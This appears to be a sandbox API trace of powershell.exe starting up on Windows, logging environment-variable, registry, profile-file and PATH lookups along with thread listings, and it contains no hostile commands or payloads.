	[0854.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.446] CoTaskMemFree (pv=0x181480) 
	[0854.446] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0854.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.446] CoTaskMemFree (pv=0x181480) 
	[0854.447] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0854.448] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.448] CoTaskMemFree (pv=0x181480) 
	[0854.449] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0854.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.449] CoTaskMemFree (pv=0x181480) 
	[0854.450] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0854.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.450] CoTaskMemFree (pv=0x181480) 
	[0855.507] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0855.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.507] CoTaskMemFree (pv=0x181480) 
	[0857.111] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1818c0
	[0857.113] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1819d0
	[0863.387] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.388] CoTaskMemFree (pv=0x181ae0) 
	[0863.393] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.393] CoTaskMemFree (pv=0x181ae0) 
	[0863.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.412] VirtualQuery (in: lpAddress=0x24bc60, lpBuffer=0x24cb20, dwLength=0x30 | out: lpBuffer=0x24cb20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0863.418] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dab8 | out: phkResult=0x24dab8*=0x388) returned 0x0
	[0863.418] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24da3c, lpData=0x0, lpcbData=0x24da38*=0x0 | out: lpType=0x24da3c*=0x1, lpData=0x0, lpcbData=0x24da38*=0x56) returned 0x0
	[0863.418] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f9170
	[0863.418] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24da0c, lpData=0x1b7f9170, lpcbData=0x24da08*=0x56 | out: lpType=0x24da0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24da08*=0x56) returned 0x0
	[0863.418] CoTaskMemFree (pv=0x1b7f9170) 
	[0863.418] RegCloseKey (hKey=0x388) returned 0x0
	[0863.419] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dab8 | out: phkResult=0x24dab8*=0x388) returned 0x0
	[0863.419] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24da3c, lpData=0x0, lpcbData=0x24da38*=0x0 | out: lpType=0x24da3c*=0x1, lpData=0x0, lpcbData=0x24da38*=0x56) returned 0x0
	[0863.419] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f9170
	[0863.419] RegQueryValueExW (in: hKey=0x388, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24da0c, lpData=0x1b7f9170, lpcbData=0x24da08*=0x56 | out: lpType=0x24da0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24da08*=0x56) returned 0x0
	[0863.419] CoTaskMemFree (pv=0x1b7f9170) 
	[0863.419] RegCloseKey (hKey=0x388) returned 0x0
	[0863.420] CoTaskMemAlloc (cb=0x20c) returned 0x1b7e9970
	[0863.420] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7e9970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0863.420] CoTaskMemFree (pv=0x1b7e9970) 
	[0863.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0863.420] CoTaskMemAlloc (cb=0x20c) returned 0x1b7e9970
	[0863.420] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7e9970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0863.420] CoTaskMemFree (pv=0x1b7e9970) 
	[0863.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d670, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0863.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0863.421] SetErrorMode (uMode=0x1) returned 0x1
	[0863.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.421] SetErrorMode (uMode=0x1) returned 0x1
	[0863.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0863.422] SetErrorMode (uMode=0x1) returned 0x1
	[0863.422] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.422] SetErrorMode (uMode=0x1) returned 0x1
	[0863.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0863.422] SetErrorMode (uMode=0x1) returned 0x1
	[0863.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.422] SetErrorMode (uMode=0x1) returned 0x1
	[0863.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0863.422] SetErrorMode (uMode=0x1) returned 0x1
	[0863.423] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24da20 | out: lpFileInformation=0x24da20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0863.423] SetErrorMode (uMode=0x1) returned 0x1
	[0863.423] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.423] CoTaskMemFree (pv=0x181ae0) 
	[0863.424] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.424] CoTaskMemFree (pv=0x181ae0) 
	[0863.424] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.424] CoTaskMemFree (pv=0x181ae0) 
	[0863.425] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.425] CoTaskMemFree (pv=0x181ae0) 
	[0863.426] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.426] CoTaskMemFree (pv=0x181ae0) 
	[0863.427] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0863.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.428] CoTaskMemFree (pv=0x181ae0) 
	[0864.326] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0864.326] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24dc00 | out: lpMode=0x24dc00) returned 1
	[0864.327] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0864.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.327] CoTaskMemFree (pv=0x181ae0) 
	[0864.330] SetEvent (hEvent=0x38c) returned 1
	[0864.331] SetEvent (hEvent=0x388) returned 1
	[0864.331] SetEvent (hEvent=0x304) returned 1
	[0864.331] SetEvent (hEvent=0x194) returned 1
	[0864.333] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0864.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.333] CoTaskMemFree (pv=0x181ae0) 
	[0864.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d958 | out: phkResult=0x24d958*=0x340) returned 0x0
	[0864.333] RegQueryValueExW (in: hKey=0x340, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d8dc, lpData=0x0, lpcbData=0x24d8d8*=0x0 | out: lpType=0x24d8dc*=0x0, lpData=0x0, lpcbData=0x24d8d8*=0x0) returned 0x2

Thread:
	id = 437
	os_tid = 0x10c0


Thread:
	id = 439
	os_tid = 0x10c8


Thread:
	id = 1223
	os_tid = 0x1924


Thread:
	id = 1225
	os_tid = 0x15ec


Thread:
	id = 1254
	os_tid = 0x1c44


Thread:
	id = 1320
	os_tid = 0x1de0


Thread:
	id = 1343
	os_tid = 0x1e5c


Thread:
	id = 1344
	os_tid = 0x1e68

	[0686.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0782.643] RegCloseKey (hKey=0x2fc) returned 0x0
	[0782.643] RegCloseKey (hKey=0x304) returned 0x0
	[0782.643] RegCloseKey (hKey=0x300) returned 0x0
	[0800.882] LocalFree (hMem=0x13ac10) returned 0x0
	[0800.882] RegCloseKey (hKey=0x318) returned 0x0
	[0800.882] LocalFree (hMem=0x13ac40) returned 0x0
	[0800.882] CloseHandle (hObject=0x304) returned 1
	[0800.883] CloseHandle (hObject=0x13) returned 1
	[0800.883] CloseHandle (hObject=0xf) returned 1
	[0809.045] RegCloseKey (hKey=0x304) returned 0x0
	[0854.434] RegCloseKey (hKey=0x360) returned 0x0
	[0854.435] RegCloseKey (hKey=0x39c) returned 0x0
	[0854.435] RegCloseKey (hKey=0x37c) returned 0x0
	[0854.435] RegCloseKey (hKey=0x378) returned 0x0
	[0854.435] RegCloseKey (hKey=0x374) returned 0x0
	[0854.436] RegCloseKey (hKey=0x370) returned 0x0
	[0854.436] RegCloseKey (hKey=0x36c) returned 0x0
	[0854.436] RegCloseKey (hKey=0x368) returned 0x0
	[0854.436] RegCloseKey (hKey=0x364) returned 0x0
	[0854.437] RegCloseKey (hKey=0x33c) returned 0x0
	[0854.437] RegCloseKey (hKey=0x398) returned 0x0
	[0854.437] RegCloseKey (hKey=0x394) returned 0x0
	[0854.437] RegCloseKey (hKey=0x35c) returned 0x0
	[0854.438] RegCloseKey (hKey=0x358) returned 0x0
	[0854.438] RegCloseKey (hKey=0x354) returned 0x0
	[0854.438] RegCloseKey (hKey=0x350) returned 0x0
	[0854.438] RegCloseKey (hKey=0x34c) returned 0x0
	[0854.439] RegCloseKey (hKey=0x348) returned 0x0
	[0854.439] RegCloseKey (hKey=0x344) returned 0x0
	[0854.439] RegCloseKey (hKey=0x340) returned 0x0
	[0854.439] RegCloseKey (hKey=0x390) returned 0x0
	[0854.440] RegCloseKey (hKey=0x330) returned 0x0
	[0854.440] RegCloseKey (hKey=0x32c) returned 0x0
	[0854.440] RegCloseKey (hKey=0x328) returned 0x0
	[0854.440] RegCloseKey (hKey=0x324) returned 0x0
	[0854.440] RegCloseKey (hKey=0x320) returned 0x0
	[0854.441] RegCloseKey (hKey=0x31c) returned 0x0
	[0854.441] RegCloseKey (hKey=0x318) returned 0x0
	[0854.441] RegCloseKey (hKey=0x310) returned 0x0
	[0854.441] RegCloseKey (hKey=0x38c) returned 0x0
	[0854.442] RegCloseKey (hKey=0x194) returned 0x0
	[0854.442] RegCloseKey (hKey=0x304) returned 0x0
	[0854.442] RegCloseKey (hKey=0x388) returned 0x0
	[0854.442] RegCloseKey (hKey=0x384) returned 0x0
	[0892.858] RegCloseKey (hKey=0x340) returned 0x0

Thread:
	id = 1503
	os_tid = 0x1de0


Thread:
	id = 1540
	os_tid = 0x2054


Thread:
	id = 1869
	os_tid = 0x24c8

	[0865.093] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0865.098] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0865.104] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.105] CoTaskMemFree (pv=0x181ae0) 
	[0865.106] VirtualQuery (in: lpAddress=0x1c84d9c0, lpBuffer=0x1c84e880, dwLength=0x30 | out: lpBuffer=0x1c84e880*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0865.109] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.110] CoTaskMemFree (pv=0x181ae0) 
	[0865.129] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.130] CoTaskMemFree (pv=0x181ae0) 
	[0865.133] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.133] CoTaskMemFree (pv=0x181ae0) 
	[0865.143] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.143] CoTaskMemFree (pv=0x181ae0) 
	[0865.146] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0865.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.147] CoTaskMemFree (pv=0x181ae0) 
	[0866.202] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.202] CoTaskMemFree (pv=0x181ae0) 
	[0866.208] VirtualQuery (in: lpAddress=0x1c84dc70, lpBuffer=0x1c84eb30, dwLength=0x30 | out: lpBuffer=0x1c84eb30*(BaseAddress=0x1c84d000, AllocationBase=0x1bec0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0866.209] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.210] CoTaskMemFree (pv=0x181ae0) 
	[0866.213] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.213] CoTaskMemFree (pv=0x181ae0) 
	[0866.213] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.213] CoTaskMemFree (pv=0x181ae0) 
	[0866.215] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.215] CoTaskMemFree (pv=0x181ae0) 
	[0866.223] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0866.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.223] CoTaskMemFree (pv=0x181ae0) 
	[0867.113] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.113] CoTaskMemFree (pv=0x181ae0) 
	[0867.129] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.129] CoTaskMemFree (pv=0x181ae0) 
	[0867.131] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.131] CoTaskMemFree (pv=0x181ae0) 
	[0867.133] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.134] CoTaskMemFree (pv=0x181ae0) 
	[0867.135] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.135] CoTaskMemFree (pv=0x181ae0) 
	[0867.137] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.137] CoTaskMemFree (pv=0x181ae0) 
	[0867.139] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.139] CoTaskMemFree (pv=0x181ae0) 
	[0867.902] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0867.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.902] CoTaskMemFree (pv=0x181ae0) 
	[0868.983] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0868.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0868.983] CoTaskMemFree (pv=0x181ae0) 
	[0868.987] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0868.987] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0868.987] CoTaskMemFree (pv=0x181ae0) 
	[0868.988] CoTaskMemAlloc (cb=0x128) returned 0x13f760
	[0868.988] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13f760, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0868.988] CoTaskMemFree (pv=0x13f760) 
	[0868.992] CoTaskMemAlloc (cb=0x20e) returned 0x1b7eb5e0
	[0868.992] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7eb5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0868.992] CoTaskMemFree (pv=0x1b7eb5e0) 
	[0868.996] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0868.997] SetErrorMode (uMode=0x1) returned 0x1
	[0869.000] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.693] SetErrorMode (uMode=0x1) returned 0x1
	[0871.695] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.695] SetErrorMode (uMode=0x1) returned 0x1
	[0871.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0872.488] SetErrorMode (uMode=0x1) returned 0x1
	[0872.489] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0872.489] SetErrorMode (uMode=0x1) returned 0x1
